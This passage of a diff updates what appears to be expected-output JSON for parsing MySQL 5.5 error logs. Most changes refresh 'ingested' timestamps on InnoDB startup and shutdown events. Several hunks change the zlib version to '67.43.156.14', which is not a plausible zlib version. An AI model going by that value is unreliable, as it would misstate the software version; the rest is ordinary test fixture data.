"2021-12-09T13:41:34.472851800Z", "category": [ "database" ], @@ -674,7 +674,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730891175Z", + "ingested": "2021-12-09T13:41:34.472858100Z", "category": [ "database" ], @@ -689,7 +689,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.730896531Z", + "ingested": "2021-12-09T13:41:34.472864600Z", "category": [ "database" ], @@ -704,7 +704,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.730898003Z", + "ingested": "2021-12-09T13:41:34.472870900Z", "category": [ "database" ], @@ -717,9 +717,9 @@ }, { "@timestamp": "2016-12-09T14:18:53.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.730899103Z", + "ingested": "2021-12-09T13:41:34.472877300Z", "category": [ "database" ], @@ -734,7 +734,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.730900426Z", + "ingested": "2021-12-09T13:41:34.472883600Z", "category": [ "database" ], @@ -749,7 +749,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.730901591Z", + "ingested": "2021-12-09T13:41:34.472889900Z", "category": [ "database" ], @@ -764,7 +764,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.730903089Z", + "ingested": "2021-12-09T13:41:34.472897600Z", "category": [ "database" ], @@ -779,7 +779,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.730904415Z", + "ingested": "2021-12-09T13:41:34.472902300Z", "category": [ "database" ], @@ -794,7 +794,7 @@ "@timestamp": "2016-12-09T14:18:54.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730905714Z", + "ingested": "2021-12-09T13:41:34.472907500Z", "category": [ "database" ], @@ -809,7 +809,7 @@ "@timestamp": "2016-12-09T14:18:54.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.730906813Z", + "ingested": "2021-12-09T13:41:34.472913900Z", "category": [ "database" ], @@ -827,7 +827,7 @@ }, "message": "Aborting", "event": { - "ingested": "2021-06-21T12:35:18.730908157Z", + "ingested": "2021-12-09T13:41:34.472920400Z", "category": [ "database" ], @@ -842,7 +842,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.730909377Z", + "ingested": "2021-12-09T13:41:34.472926800Z", "category": [ "database" ], @@ -857,7 +857,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.730910468Z", + "ingested": "2021-12-09T13:41:34.472933100Z", "category": [ "database" ], @@ -872,7 +872,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730911774Z", + "ingested": "2021-12-09T13:41:34.472939400Z", "category": [ "database" ], @@ -890,7 +890,7 @@ }, "message": "/usr/sbin/mysqld: Shutdown complete", "event": { - "ingested": "2021-06-21T12:35:18.730912859Z", + "ingested": "2021-12-09T13:41:34.472945700Z", "category": [ "database" ], @@ -904,7 +904,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.730913926Z", + "ingested": "2021-12-09T13:41:34.472952100Z", "category": [ "database" ], @@ -922,7 +922,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730915350Z", + "ingested": "2021-12-09T13:41:34.472958500Z", "category": [ "database" ], @@ -940,7 +940,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730916622Z", + "ingested": "2021-12-09T13:41:34.472963400Z", "category": [ "database" ], @@ -955,7 +955,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.730917921Z", + "ingested": "2021-12-09T13:41:34.472967900Z", "category": [ "database" ], @@ -970,7 +970,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.730919007Z", + "ingested": "2021-12-09T13:41:34.472973Z", "category": [ "database" ], @@ -983,9 +983,9 @@ }, { "@timestamp": "2016-12-09T14:18:56.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.730920349Z", + "ingested": "2021-12-09T13:41:34.472979800Z", "category": [ "database" ], @@ -1000,7 +1000,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.730921603Z", + "ingested": "2021-12-09T13:41:34.472986300Z", "category": [ "database" ], @@ -1015,7 +1015,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.730922954Z", + "ingested": "2021-12-09T13:41:34.472992300Z", "category": [ "database" ], @@ -1030,7 +1030,7 @@ "@timestamp": "2016-12-09T14:18:57.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.730924124Z", + "ingested": "2021-12-09T13:41:34.472998100Z", "category": [ "database" ], @@ -1045,7 +1045,7 @@ "@timestamp": "2016-12-09T14:18:57.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.730925418Z", + "ingested": "2021-12-09T13:41:34.473003200Z", "category": [ "database" ], @@ -1060,7 +1060,7 @@ "@timestamp": "2016-12-09T14:18:58.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730926530Z", + "ingested": "2021-12-09T13:41:34.473008800Z", "category": [ "database" ], @@ -1078,7 +1078,7 @@ }, "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306", "event": { - "ingested": "2021-06-21T12:35:18.730927598Z", + "ingested": "2021-12-09T13:41:34.473015100Z", "category": [ "database" ], @@ -1096,7 +1096,7 @@ }, "message": "- '127.0.0.1' resolves to '127.0.0.1';", "event": { - "ingested": "2021-06-21T12:35:18.730928933Z", + "ingested": "2021-12-09T13:41:34.473021500Z", "category": [ "database" ], @@ -1114,7 +1114,7 @@ }, "message": "Server socket created on IP: '127.0.0.1'.", "event": { - "ingested": "2021-06-21T12:35:18.730930023Z", + "ingested": "2021-12-09T13:41:34.473027700Z", "category": [ "database" ], @@ -1132,7 +1132,7 @@ }, "message": "Event Scheduler: Loaded 0 events", "event": { - "ingested": "2021-06-21T12:35:18.730931458Z", + "ingested": "2021-12-09T13:41:34.473034100Z", "category": [ "database" ], @@ -1150,7 +1150,7 @@ }, "message": "/usr/sbin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:18.730933142Z", + "ingested": "2021-12-09T13:41:34.473040800Z", "category": [ "database" ], @@ -1164,7 +1164,7 @@ { "message": "Version: '5.5.53-0ubuntu0.12.04.1' socket: '/var/run/mysqld/mysqld.sock' port: 3306 (Ubuntu)", "event": { - "ingested": "2021-06-21T12:35:18.730934286Z", + "ingested": "2021-12-09T13:41:34.473047200Z", "category": [ "database" ], @@ -1182,7 +1182,7 @@ }, "message": "/usr/sbin/mysqld: Normal shutdown", "event": { - "ingested": "2021-06-21T12:35:18.730935613Z", + "ingested": "2021-12-09T13:41:34.473053600Z", "category": [ "database" ], @@ -1196,7 +1196,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.730936423Z", + "ingested": "2021-12-09T13:41:34.473060Z", "category": [ "database" ], @@ -1214,7 +1214,7 @@ }, "message": "Event Scheduler: Purging the queue. 0 events", "event": { - "ingested": "2021-06-21T12:35:18.730937148Z", + "ingested": "2021-12-09T13:41:34.473066300Z", "category": [ "database" ], @@ -1229,7 +1229,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.730937983Z", + "ingested": "2021-12-09T13:41:34.473072600Z", "category": [ "database" ], @@ -1244,7 +1244,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595685", "event": { - "ingested": "2021-06-21T12:35:18.730938868Z", + "ingested": "2021-12-09T13:41:34.473078900Z", "category": [ "database" ], @@ -1262,7 +1262,7 @@ }, "message": "/usr/sbin/mysqld: Shutdown complete", "event": { - "ingested": "2021-06-21T12:35:18.730940028Z", + "ingested": "2021-12-09T13:41:34.473090500Z", "category": [ "database" ], @@ -1276,7 +1276,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.730940873Z", + "ingested": "2021-12-09T13:41:34.473097200Z", "category": [ "database" ], @@ -1294,7 +1294,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730941538Z", + "ingested": "2021-12-09T13:41:34.473103500Z", "category": [ "database" ], @@ -1312,7 +1312,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730942237Z", + "ingested": "2021-12-09T13:41:34.473109700Z", "category": [ "database" ], @@ -1327,7 +1327,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.730943103Z", + "ingested": "2021-12-09T13:41:34.473115900Z", "category": [ "database" ], @@ -1342,7 +1342,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.730943758Z", + "ingested": "2021-12-09T13:41:34.473121400Z", "category": [ "database" ], @@ -1355,9 +1355,9 @@ }, { "@timestamp": "2016-12-09T14:37:57.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.730944420Z", + "ingested": "2021-12-09T13:41:34.473125400Z", "category": [ "database" ], @@ -1372,7 +1372,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.730945355Z", + "ingested": "2021-12-09T13:41:34.473130900Z", "category": [ "database" ], @@ -1387,7 +1387,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.730946081Z", + "ingested": "2021-12-09T13:41:34.473137500Z", "category": [ "database" ], @@ -1402,7 +1402,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.730946899Z", + "ingested": "2021-12-09T13:41:34.473142Z", "category": [ "database" ], @@ -1417,7 +1417,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.730947580Z", + "ingested": "2021-12-09T13:41:34.473147300Z", "category": [ "database" ], @@ -1432,7 +1432,7 @@ "@timestamp": "2016-12-09T14:37:58.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595685", "event": { - "ingested": "2021-06-21T12:35:18.730948238Z", + "ingested": "2021-12-09T13:41:34.473154Z", "category": [ "database" ], @@ -1450,7 +1450,7 @@ }, "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306", "event": { - "ingested": "2021-06-21T12:35:18.730949049Z", + "ingested": "2021-12-09T13:41:34.473160300Z", "category": [ "database" ], @@ -1468,7 +1468,7 @@ }, "message": "- '127.0.0.1' resolves to '127.0.0.1';", "event": { - "ingested": "2021-06-21T12:35:18.730949705Z", + "ingested": "2021-12-09T13:41:34.473165700Z", "category": [ "database" ], @@ -1486,7 +1486,7 @@ }, "message": "Server socket created on IP: '127.0.0.1'.", "event": { - "ingested": "2021-06-21T12:35:18.730950624Z", + "ingested": "2021-12-09T13:41:34.473171Z", "category": [ "database" ], @@ -1504,7 +1504,7 @@ }, "message": "Event Scheduler: Loaded 0 events", "event": { - "ingested": "2021-06-21T12:35:18.730951308Z", + "ingested": "2021-12-09T13:41:34.473175600Z", "category": [ "database" ], @@ -1522,7 +1522,7 @@ }, "message": "/usr/sbin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:18.730951940Z", + "ingested": "2021-12-09T13:41:34.473181500Z", "category": [ "database" ], @@ -1536,7 +1536,7 @@ { "message": "Version: '5.5.53-0ubuntu0.12.04.1-log' socket: '/var/run/mysqld/mysqld.sock' port: 3306 (Ubuntu)", "event": { - "ingested": "2021-06-21T12:35:18.730952607Z", + "ingested": "2021-12-09T13:41:34.473187900Z", "category": [ "database" ], @@ -1554,7 +1554,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730953396Z", + "ingested": "2021-12-09T13:41:34.473194600Z", "category": [ "database" ], @@ -1572,7 +1572,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730954097Z", + "ingested": "2021-12-09T13:41:34.473200900Z", "category": [ "database" ], @@ -1587,7 +1587,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.730954840Z", + "ingested": "2021-12-09T13:41:34.473207300Z", "category": [ "database" ], @@ -1602,7 +1602,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.730955702Z", + "ingested": "2021-12-09T13:41:34.473213600Z", "category": [ "database" ], @@ -1615,9 +1615,9 @@ }, { "@timestamp": "2016-12-09T14:18:50.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.730956694Z", + "ingested": "2021-12-09T13:41:34.473219900Z", "category": [ "database" ], @@ -1632,7 +1632,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.730957670Z", + "ingested": "2021-12-09T13:41:34.473226500Z", "category": [ "database" ], @@ -1647,7 +1647,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.730958795Z", + "ingested": "2021-12-09T13:41:34.473235Z", "category": [ "database" ], @@ -1661,7 +1661,7 @@ { "message": "InnoDB: The first specified data file ./ibdata1 did not exist:", "event": { - "ingested": "2021-06-21T12:35:18.730959563Z", + "ingested": "2021-12-09T13:41:34.473244800Z", "category": [ "database" ], @@ -1675,7 +1675,7 @@ { "message": "InnoDB: a new database to be created!", "event": { - "ingested": "2021-06-21T12:35:18.730960368Z", + "ingested": "2021-12-09T13:41:34.473254100Z", "category": [ "database" ], @@ -1690,7 +1690,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Setting file ./ibdata1 size to 10 MB", "event": { - "ingested": "2021-06-21T12:35:18.730961131Z", + "ingested": "2021-12-09T13:41:34.473261200Z", "category": [ "database" ], @@ -1704,7 +1704,7 @@ { "message": "InnoDB: Database physically writes the file full: wait...", "event": { - "ingested": "2021-06-21T12:35:18.730961909Z", + "ingested": "2021-12-09T13:41:34.473268Z", "category": [ "database" ], @@ -1719,7 +1719,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Log file ./ib_logfile0 did not exist: new to be created", "event": { - "ingested": "2021-06-21T12:35:18.730962998Z", + "ingested": "2021-12-09T13:41:34.473274600Z", "category": [ "database" ], @@ -1733,7 +1733,7 @@ { "message": "InnoDB: Setting log file ./ib_logfile0 size to 5 MB", "event": { - "ingested": "2021-06-21T12:35:18.730963898Z", + "ingested": "2021-12-09T13:41:34.473280500Z", "category": [ "database" ], @@ -1747,7 +1747,7 @@ { "message": "InnoDB: Database physically writes the file full: wait...", "event": { - "ingested": "2021-06-21T12:35:18.730964819Z", + "ingested": "2021-12-09T13:41:34.473286Z", "category": [ "database" ], @@ -1762,7 +1762,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Log file ./ib_logfile1 did not exist: new to be created", "event": { - "ingested": "2021-06-21T12:35:18.730965716Z", + "ingested": "2021-12-09T13:41:34.473292300Z", "category": [ "database" ], @@ -1776,7 +1776,7 @@ { "message": "InnoDB: Setting log file ./ib_logfile1 size to 5 MB", "event": { - "ingested": "2021-06-21T12:35:18.730966811Z", + "ingested": "2021-12-09T13:41:34.473298600Z", "category": [ "database" ], @@ -1790,7 +1790,7 @@ { "message": "InnoDB: Database physically writes the file full: wait...", "event": { - "ingested": "2021-06-21T12:35:18.730967587Z", + "ingested": "2021-12-09T13:41:34.473302900Z", "category": [ "database" ], @@ -1804,7 +1804,7 @@ { "message": "InnoDB: Doublewrite buffer not found: creating new", "event": { - "ingested": "2021-06-21T12:35:18.730968243Z", + "ingested": "2021-12-09T13:41:34.473307400Z", "category": [ "database" ], @@ -1818,7 +1818,7 @@ { "message": "InnoDB: Doublewrite buffer created", "event": { - "ingested": "2021-06-21T12:35:18.730969019Z", + "ingested": "2021-12-09T13:41:34.473312500Z", "category": [ "database" ], @@ -1832,7 +1832,7 @@ { "message": "InnoDB: 127 rollback segment(s) active.", "event": { - "ingested": "2021-06-21T12:35:18.730969649Z", + "ingested": "2021-12-09T13:41:34.473318900Z", "category": [ "database" ], @@ -1846,7 +1846,7 @@ { "message": "InnoDB: Creating foreign key constraint system tables", "event": { - "ingested": "2021-06-21T12:35:18.730970341Z", + "ingested": "2021-12-09T13:41:34.473324300Z", "category": [ "database" ], @@ -1860,7 +1860,7 @@ { "message": "InnoDB: Foreign key constraint system tables created", "event": { - "ingested": "2021-06-21T12:35:18.730970972Z", + "ingested": "2021-12-09T13:41:34.473329200Z", "category": [ "database" ], @@ -1875,7 +1875,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.730971627Z", + "ingested": "2021-12-09T13:41:34.473373Z", "category": [ "database" ], @@ -1890,7 +1890,7 @@ "@timestamp": "2016-12-09T14:18:51.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 0", "event": { - "ingested": "2021-06-21T12:35:18.730972319Z", + "ingested": "2021-12-09T13:41:34.473378800Z", "category": [ "database" ], @@ -1905,7 +1905,7 @@ "@timestamp": "2016-12-09T14:18:51.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.730973043Z", + "ingested": "2021-12-09T13:41:34.473385100Z", "category": [ "database" ], @@ -1920,7 +1920,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730973793Z", + "ingested": "2021-12-09T13:41:34.473390700Z", "category": [ "database" ], @@ -1938,7 +1938,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730974700Z", + "ingested": "2021-12-09T13:41:34.473396Z", "category": [ "database" ], @@ -1956,7 +1956,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730975388Z", + "ingested": "2021-12-09T13:41:34.473401500Z", "category": [ "database" ], @@ -1971,7 +1971,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.730976049Z", + "ingested": "2021-12-09T13:41:34.473407900Z", "category": [ "database" ], @@ -1986,7 +1986,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.730976724Z", + "ingested": "2021-12-09T13:41:34.473414200Z", "category": [ "database" ], @@ -1999,9 +1999,9 @@ }, { "@timestamp": "2016-12-09T14:18:52.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.730977396Z", + "ingested": "2021-12-09T13:41:34.473420400Z", "category": [ "database" ], @@ -2016,7 +2016,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.730978163Z", + "ingested": "2021-12-09T13:41:34.473426700Z", "category": [ "database" ], @@ -2031,7 +2031,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.730979189Z", + "ingested": "2021-12-09T13:41:34.473433100Z", "category": [ "database" ], @@ -2046,7 +2046,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.730980125Z", + "ingested": "2021-12-09T13:41:34.473439300Z", "category": [ "database" ], @@ -2061,7 +2061,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.730980892Z", + "ingested": "2021-12-09T13:41:34.473445700Z", "category": [ "database" ], @@ -2076,7 +2076,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730981737Z", + "ingested": "2021-12-09T13:41:34.473451900Z", "category": [ "database" ], @@ -2090,7 +2090,7 @@ { "message": "ERROR: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ALTER TABLE user ADD column Show_view_priv enum('N','Y') CHARACTER SET utf8 NOT ' at line 1", "event": { - "ingested": "2021-06-21T12:35:18.730982429Z", + "ingested": "2021-12-09T13:41:34.473458200Z", "category": [ "database" ], @@ -2108,7 +2108,7 @@ }, "message": "Aborting", "event": { - "ingested": "2021-06-21T12:35:18.730983304Z", + "ingested": "2021-12-09T13:41:34.473464600Z", "category": [ "database" ], @@ -2123,7 +2123,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.730984251Z", + "ingested": "2021-12-09T13:41:34.473470900Z", "category": [ "database" ], @@ -2138,7 +2138,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.730985131Z", + "ingested": "2021-12-09T13:41:34.473477200Z", "category": [ "database" ], @@ -2153,7 +2153,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730986327Z", + "ingested": "2021-12-09T13:41:34.473483500Z", "category": [ "database" ], @@ -2171,7 +2171,7 @@ }, "message": "/usr/sbin/mysqld: Shutdown complete", "event": { - "ingested": "2021-06-21T12:35:18.730987264Z", + "ingested": "2021-12-09T13:41:34.473489900Z", "category": [ "database" ], @@ -2185,7 +2185,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.730987944Z", + "ingested": "2021-12-09T13:41:34.473496300Z", "category": [ "database" ], @@ -2203,7 +2203,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730988683Z", + "ingested": "2021-12-09T13:41:34.473502600Z", "category": [ "database" ], @@ -2221,7 +2221,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730989494Z", + "ingested": "2021-12-09T13:41:34.473508900Z", "category": [ "database" ], @@ -2236,7 +2236,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.730990289Z", + "ingested": "2021-12-09T13:41:34.473515300Z", "category": [ "database" ], @@ -2251,7 +2251,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.730991133Z", + "ingested": "2021-12-09T13:41:34.473521600Z", "category": [ "database" ], @@ -2264,9 +2264,9 @@ }, { "@timestamp": "2016-12-09T14:18:53.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.730992169Z", + "ingested": "2021-12-09T13:41:34.473526100Z", "category": [ "database" ], @@ -2281,7 +2281,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.730992823Z", + "ingested": "2021-12-09T13:41:34.473531300Z", "category": [ "database" ], @@ -2296,7 +2296,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.730993579Z", + "ingested": "2021-12-09T13:41:34.473537600Z", "category": [ "database" ], @@ -2311,7 +2311,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.730994303Z", + "ingested": "2021-12-09T13:41:34.473546600Z", "category": [ "database" ], @@ -2326,7 +2326,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.730995116Z", + "ingested": "2021-12-09T13:41:34.473551400Z", "category": [ "database" ], @@ -2341,7 +2341,7 @@ "@timestamp": "2016-12-09T14:18:54.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730996276Z", + "ingested": "2021-12-09T13:41:34.473556600Z", "category": [ "database" ], @@ -2356,7 +2356,7 @@ "@timestamp": "2016-12-09T14:18:54.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.730997004Z", + "ingested": "2021-12-09T13:41:34.473561100Z", "category": [ "database" ], @@ -2371,7 +2371,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730997740Z", + "ingested": "2021-12-09T13:41:34.473566600Z", "category": [ "database" ], @@ -2389,7 +2389,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730998460Z", + "ingested": "2021-12-09T13:41:34.473572900Z", "category": [ "database" ], @@ -2407,7 +2407,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730999361Z", + "ingested": "2021-12-09T13:41:34.473579200Z", "category": [ "database" ], @@ -2422,7 +2422,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.731000094Z", + "ingested": "2021-12-09T13:41:34.473585400Z", "category": [ "database" ], @@ -2437,7 +2437,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.731000809Z", + "ingested": "2021-12-09T13:41:34.473591700Z", "category": [ "database" ], @@ -2450,9 +2450,9 @@ }, { "@timestamp": "2016-12-09T14:18:55.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.731001565Z", + "ingested": "2021-12-09T13:41:34.473597500Z", "category": [ "database" ], @@ -2467,7 +2467,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.731002236Z", + "ingested": "2021-12-09T13:41:34.473603800Z", "category": [ "database" ], @@ -2482,7 +2482,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.731002995Z", + "ingested": "2021-12-09T13:41:34.473610100Z", "category": [ "database" ], @@ -2497,7 +2497,7 @@ "@timestamp": 